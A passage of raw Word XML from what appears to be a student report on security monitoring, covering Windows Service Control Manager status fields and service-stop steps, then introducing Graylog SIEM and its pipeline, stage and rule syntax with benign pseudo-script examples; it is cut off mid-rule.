        <w:t xml:space="preserve"> SCM follow this information so that it does not mistakenly send control requests that violate the current service’s state. The service status sent includes:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007644D7" w:rsidRDefault="007644D7" w:rsidP="007644D7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007644D7">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Service Type:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A service type can be a device driver, a system driver or a </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> service, and can run its own process or share a process with other services.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008668F2" w:rsidRDefault="008668F2" w:rsidP="008668F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007644D7" w:rsidRDefault="007644D7" w:rsidP="007644D7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007644D7">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Current State:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Indicates the state of the service as starting, running, paused or not running.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008668F2" w:rsidRDefault="008668F2" w:rsidP="008668F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008668F2" w:rsidRPr="008668F2" w:rsidRDefault="007644D7" w:rsidP="007644D7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007644D7">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Acceptable control codes: </w:t>
      </w:r>
      <w:r w:rsidR="008668F2">
        <w:t>Control code that the service can accept and process in its handler function, according to the state.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008668F2" w:rsidRPr="008668F2" w:rsidRDefault="008668F2" w:rsidP="008668F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008668F2" w:rsidRPr="008668F2" w:rsidRDefault="00E41963" w:rsidP="008668F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidR="008668F2">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> exit code: </w:t>
      </w:r>
      <w:r w:rsidR="008668F2">
        <w:t xml:space="preserve">If an error occurs when a service is starting or stopping, it uses this code to reports to the system. </w:t>
      </w:r>
      <w:r w:rsidR="008668F2" w:rsidRPr="008668F2">
        <w:t>To return an error code specific to the service, the service must set this value to ERROR_SERVICE_SPECIFIC_</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008668F2" w:rsidRDefault="008668F2" w:rsidP="008668F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="008668F2">
        <w:t>ERROR to indicate that additional information can be found in the service exit code. The service sets this value to NO_ERROR when it is running or stopping properly.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008668F2" w:rsidRDefault="008668F2" w:rsidP="008668F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008668F2" w:rsidRPr="008668F2" w:rsidRDefault="008668F2" w:rsidP="008668F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Service exit code: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The service uses this code to report an error when it is starting or stopping. The value is ignored unless the </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> exit code is set to ERROR_SERVICE_SPECIFIC_ERROR.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008668F2" w:rsidRPr="008668F2" w:rsidRDefault="008668F2" w:rsidP="008668F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008668F2" w:rsidRPr="008668F2" w:rsidRDefault="008668F2" w:rsidP="008668F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Wait hint: </w:t>
      </w:r>
      <w:r w:rsidRPr="008668F2">
        <w:t>The service uses this code to report the estimated time, in milliseconds, required for a pending start, stop, pause, or continue operation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008668F2" w:rsidRPr="008668F2" w:rsidRDefault="008668F2" w:rsidP="008668F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000679BF" w:rsidRDefault="008668F2" w:rsidP="00430F22">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000679BF">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Checkpoint: </w:t>
      </w:r>
      <w:r w:rsidRPr="008668F2">
        <w:t>The service uses this value to periodically report its progress during a lengthy start, stop, pause, or continue operation. For example, the Services tool uses this value to track the progress of the service during start and stop operations.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000679BF" w:rsidRDefault="000679BF" w:rsidP="000679BF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AF24DE" w:rsidRDefault="001B6B58" w:rsidP="00EA77C6">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>When stopping a service, SCM performs the following steps:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B6B58" w:rsidRPr="0079537F" w:rsidRDefault="001B6B58" w:rsidP="001B6B58">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0079537F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SCM receives a stop request for a service</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B6B58" w:rsidRDefault="0079537F" w:rsidP="001B6B58">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>A service control program which wants to stop a service will send a SERVICE_CONTROL_STOP request to the service through SCM.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A51D11" w:rsidRDefault="00A51D11" w:rsidP="001B6B58">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EA77C6" w:rsidRDefault="00EA77C6">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B6B58" w:rsidRPr="0079537F" w:rsidRDefault="001B6B58" w:rsidP="001B6B58">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0079537F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>SCM examines the service dependencies</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0079537F" w:rsidRDefault="0079537F" w:rsidP="0079537F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">If SCM finds any running service that are dependent on the service requested to be stopped, SCM will return an error code to the service control program. Before triggering the stop procedure, the service control program </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>has to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> enumerate and stop all services that are dependent on the service requested. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A51D11" w:rsidRDefault="00A51D11" w:rsidP="0079537F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001B6B58" w:rsidRDefault="001B6B58" w:rsidP="001B6B58">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0079537F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SCM forwards the stop request to the service</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00630EC7" w:rsidRPr="00630EC7" w:rsidRDefault="00630EC7" w:rsidP="00630EC7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>If SCM detects that no dependent active services, SCM instructs the specified service to stop by forwarding the stop code to the service. The service must now free its allocated resources and shut down.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A51D11" w:rsidRDefault="00A51D11">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FB1472" w:rsidRDefault="00FB1472" w:rsidP="00FB1472"/>
    <w:p w:rsidR="001C2E70" w:rsidRDefault="001C2E70">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095BB2" w:rsidRPr="00095BB2" w:rsidRDefault="00095BB2" w:rsidP="00C973CF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="51" w:name="_Toc485303720"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Graylog</w:t>
      </w:r>
      <w:bookmarkEnd w:id="51"/>
    </w:p>
    <w:p w:rsidR="00FB778B" w:rsidRDefault="00F17DB1" w:rsidP="00F17DB1">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F17DB1" w:rsidRDefault="00064EB7" w:rsidP="00F17DB1">
      <w:r>
        <w:t xml:space="preserve">Graylog is a Security Information and Event Management (SIEM) software. Developed in 2010 by Lennart Koopmann in his free time, nowadays Gray log has become one of the best opensource SIEM and Log Monitor that is used worldwide by enterprises and corporations around the world. </w:t>
      </w:r>
      <w:r w:rsidR="00AA7BD6">
        <w:t xml:space="preserve">Graylog’s first version was published in Mach, 2015 as an opensouce software that is supported by community and a purchased solution to support large enterprises and campuses. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA7BD6" w:rsidRDefault="00AA7BD6" w:rsidP="00AA7BD6">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Graylog </w:t>
      </w:r>
      <w:r w:rsidR="00754DC7">
        <w:t>operations</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B60E4" w:rsidRDefault="00754DC7" w:rsidP="00AA7BD6">
      <w:r>
        <w:t xml:space="preserve">Graylog has been developed to become a centralized log distributed system. Coding </w:t>
      </w:r>
      <w:r w:rsidR="008B60E4">
        <w:t>by</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Java for working on linux operation system, </w:t>
      </w:r>
      <w:r w:rsidR="008B60E4">
        <w:t>Graylog inherits from Unix all the best of this famous operation system. Working as a software that has abilities of flexibility, adaptability, high availability and its supporting community, Graylog can support large enterprises and campuses those has</w:t>
      </w:r>
      <w:r w:rsidR="007E3DD2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="007E3DD2">
        <w:t xml:space="preserve">a large </w:t>
      </w:r>
      <w:r w:rsidR="009676F8">
        <w:t>number</w:t>
      </w:r>
      <w:r w:rsidR="007E3DD2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008B60E4">
        <w:t>of</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="008B60E4">
        <w:t xml:space="preserve"> users</w:t>
      </w:r>
      <w:r w:rsidR="007E3DD2">
        <w:t xml:space="preserve"> in a</w:t>
      </w:r>
      <w:r w:rsidR="008B60E4">
        <w:t xml:space="preserve"> robust and trust</w:t>
      </w:r>
      <w:r w:rsidR="007E3DD2">
        <w:t>ful way</w:t>
      </w:r>
      <w:r w:rsidR="008B60E4">
        <w:t>. Grayl</w:t>
      </w:r>
      <w:r w:rsidR="007E3DD2">
        <w:t>og operations can be listed as</w:t>
      </w:r>
      <w:r w:rsidR="008B60E4">
        <w:t xml:space="preserve"> function</w:t>
      </w:r>
      <w:r w:rsidR="007E3DD2">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="008B60E4">
        <w:t xml:space="preserve"> for:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B60E4" w:rsidRPr="007E3DD2" w:rsidRDefault="008B60E4" w:rsidP="00AA7BD6">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E3DD2">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Collecting, Preprocessing and Managing log</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0033002B" w:rsidRDefault="008B60E4" w:rsidP="007E3DD2">
      <w:r>
        <w:t>Graylog</w:t>
      </w:r>
      <w:r w:rsidR="009676F8">
        <w:t xml:space="preserve"> is a log server that</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> provides many methods for collecting log information from variety sources, via its collector that has ability to be deployed in many different operation system environments. </w:t>
      </w:r>
      <w:r w:rsidR="007E3DD2">
        <w:t xml:space="preserve">Via its collectors, Graylog collects the operating information and event from its clients, then centralized manages that data, process it and manage it as well as alert on malfunction or malicious behaviors happened on its client systems. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA7BD6" w:rsidRDefault="0033002B" w:rsidP="007E3DD2">
      <w:r w:rsidRPr="00830CDC">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>For Processing the log data</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="007E3DD2">
        <w:t xml:space="preserve">Graylog provides an ability called “Pipelines”, which is an essential concept in Graylog’s operation </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1948390749"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="007E3DD2">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="007E3DD2">
            <w:instrText xml:space="preserve"> CITATION Gra \l 1033 </w:instrText>
          </w:r>
          <w:r w:rsidR="007E3DD2">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="007E3DD2">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>(15)</w:t>
          </w:r>
          <w:r w:rsidR="007E3DD2">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="007E3DD2">
        <w:t xml:space="preserve">. Pipelines tie together the processing steps that Graylog applies to our data. </w:t>
      </w:r>
      <w:r w:rsidR="009676F8">
        <w:t xml:space="preserve">Containing rules and can connect to log streams from clients that send to its server, pipelines decides which process </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="009676F8">
        <w:t>has to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="009676F8">
        <w:t xml:space="preserve"> be done on which kind of message. When working with a complicated message that a </w:t>
      </w:r>
      <w:r w:rsidR="00F216DD">
        <w:t>separately</w:t>
      </w:r>
      <w:r w:rsidR="009676F8">
        <w:t xml:space="preserve"> standing rule cannot be applied appropriately, </w:t>
      </w:r>
      <w:r w:rsidR="00F216DD">
        <w:t xml:space="preserve">pipelines implement a concept called “stages”. Stages are considered as groups of conditions those are the rules defined for pipelines. Stages that are similar in priority run at the same time across all connected pipelines, they decide </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00F216DD">
        <w:t>whether or not</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00F216DD">
        <w:t xml:space="preserve"> taking the next priority state. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F216DD" w:rsidRDefault="00F216DD" w:rsidP="008B23B2">
      <w:r w:rsidRPr="0033002B">
        <w:t>Structure of pipeline</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is specified as a script that has many lines comprise of which defines the name of pipeline and those define the rules, the stages and their conditions.</w:t>
      </w:r>
      <w:r w:rsidR="006A3B63">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>The structure can be explain</w:t>
      </w:r>
      <w:r w:rsidR="00C27956">
        <w:t>ed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in the following pseudo-script.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F216DD" w:rsidRPr="00C27956" w:rsidRDefault="00F216DD" w:rsidP="009B04F7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C27956">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>pipeline “My pipeline”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F216DD" w:rsidRPr="00C27956" w:rsidRDefault="00F216DD" w:rsidP="009B04F7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C27956">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C27956">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
        <w:t>stage 1 match all</w:t>
      </w:r>
      <w:r w:rsidRPr="00C27956">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F216DD" w:rsidRPr="00C27956" w:rsidRDefault="00F216DD" w:rsidP="009B04F7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C27956">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C27956">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C27956">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
        <w:t>rule “has firewall fields”;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F216DD" w:rsidRPr="00C27956" w:rsidRDefault="00F216DD" w:rsidP="009B04F7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C27956">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C27956">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C27956">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
        <w:t>rule “from firewall subnet”;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F216DD" w:rsidRPr="00C27956" w:rsidRDefault="00F216DD" w:rsidP="009B04F7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C27956">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C27956">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
        <w:t>stage 2 match either</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C27956" w:rsidRPr="00C27956" w:rsidRDefault="00C27956" w:rsidP="009B04F7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C27956">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C27956">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C27956">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
        <w:t>rule “geocode IPs”;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F216DD" w:rsidRPr="00C27956" w:rsidRDefault="00F216DD" w:rsidP="009B04F7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C27956">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C27956">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C27956">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
        <w:t>rule “anonymize source IPs”</w:t>
      </w:r>
      <w:r w:rsidR="00C27956" w:rsidRPr="00C27956">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F216DD" w:rsidRPr="00C27956" w:rsidRDefault="00F216DD" w:rsidP="009B04F7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C27956">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C27956">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
        <w:t>end</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F216DD" w:rsidRDefault="00C27956" w:rsidP="00F216DD">
      <w:r>
        <w:t>The script describes that the pipeline name is “My pipeline”, which has 2 stages those are “stage 1” and “stage 2”.  The stage’s condition for comparison is specified after the word “match”, which tells</w:t>
      </w:r>
      <w:r w:rsidR="00620473">
        <w:t xml:space="preserve"> the stage to compare</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the characteristic of the current working log stream with the rule defined after the “rule” word. The condition “match all” defines that the stage only returns true if only all the rules specified in it return true, when compare with the current working log stream. The condition “match either” defines that the stage returns true when one of the rule comparison returns true.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0033002B" w:rsidRDefault="0033002B" w:rsidP="0033002B">
      <w:r>
        <w:t>Rules are the cornerstones of the processing pipeline, they contain the definitions for pipelines to know whether to change, enrich, route or drop the messages. Graylog supports a simple rule language for us to easily define the processing logic. Let’s consider a pseudo script defining rules, which are specified in the script of stages we have explained above.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0033002B" w:rsidRPr="009B04F7" w:rsidRDefault="0033002B" w:rsidP="009B04F7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009B04F7">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>rule “has firewall fields”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0033002B" w:rsidRPr="009B04F7" w:rsidRDefault="0033002B" w:rsidP="009B04F7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="710"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B04F7">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>when</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0033002B" w:rsidRPr="009B04F7" w:rsidRDefault="0033002B" w:rsidP="009B04F7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B04F7">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009B04F7">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009B04F7">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
        <w:t>has_field(“src_ip”) &amp;&amp; has_field(“dst_ip”)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0033002B" w:rsidRPr="009B04F7" w:rsidRDefault="0033002B" w:rsidP="009B04F7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="710"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B04F7">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>then</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0033002B" w:rsidRPr="009B04F7" w:rsidRDefault="0033002B" w:rsidP="009B04F7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="710"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B04F7">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>end</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0033002B" w:rsidRDefault="0033002B" w:rsidP="0033002B">
      <w:r>
        <w:t>And another rule is</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0033002B" w:rsidRPr="009B04F7" w:rsidRDefault="0033002B" w:rsidP="009B04F7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009B04F7">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>rule “from firewall subnet”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0033002B" w:rsidRPr="009B04F7" w:rsidRDefault="0033002B" w:rsidP="009B04F7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B04F7">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009B04F7">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
        <w:t>when</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0033002B" w:rsidRPr="009B04F7" w:rsidRDefault="0033002B" w:rsidP="009B04F7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B04F7">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009B04F7">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
      </w:r>
